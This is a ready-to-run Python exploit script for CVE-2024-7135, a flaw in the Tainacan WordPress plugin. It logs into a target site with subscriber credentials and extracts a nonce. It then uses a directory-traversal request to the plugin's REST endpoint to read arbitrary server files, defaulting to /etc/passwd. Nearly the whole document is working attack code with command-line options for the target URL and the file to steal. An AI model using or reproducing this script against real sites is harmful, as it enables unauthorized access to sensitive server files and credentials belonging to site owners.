#!/usr/bin/env python3 import argparse import requests import re from getpass import getpass from bs4 import BeautifulSoup import os ## Exploit script by @RandomRobbieBF http_proxy = "" os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" def vulncheck(url, username, password, ff): # Perform vulnerability check logic here print("Vulnerability check:", url) # Login to WordPress login_url = f"{url}/wp-login.php" session = requests.Session() login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{url}/wp-admin/profile.php", } try: login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent}) login_response.raise_for_status() # Extract the required cookies from the response headers cookies = login_response.cookies # Confirm successful login if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("Logged in successfully.") try: soup = BeautifulSoup(login_response.text, 'html.parser') script_tag = soup.find('script', id='tainacan-blocks-query-variations-js-extra') javascript_content = script_tag.string match = re.search(r'"nonce":"(.*?)"', javascript_content) nonce_value = match.group(1) except Exception as e: print("Failed to extract nonce - "+str(e)+"") exit() else: print("Failed to log in.") exit() main_url = f"{url}/wp-json/tainacan/v2/bg-processes/file?guid=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e"+ff+"&_wpnonce="+nonce_value+"" ajax_response = session.get(main_url, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"}) ajax_response.raise_for_status() # Check if option set successfully if ajax_response.status_code == 200: print("Extracted text:\n\n", ajax_response.text) else: print(""+ajax_response.text+"") except requests.exceptions.RequestException as e: print(f"Request failed with an error: {e}") # Add the vulnerability description as a comment DESCRIPTION = """ Tainacan <= 0.21.7 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Read Description: CVE-2024-7135 | The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. """ # Use argparse to get the URL, username, and password arguments parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument("-u", "--url", help="Website URL", required=True) parser.add_argument("-un", "--username", help="WordPress username") parser.add_argument("-p", "--password", help="WordPress password") parser.add_argument("-f", "--file", default="/etc/passwd", help="File to display") args = parser.parse_args() # Prompt for password if not provided as an argument if not args.password: args.password = getpass("Enter the WordPress password: ") # Usage vulncheck(args.url, args.username, args.password, args.file)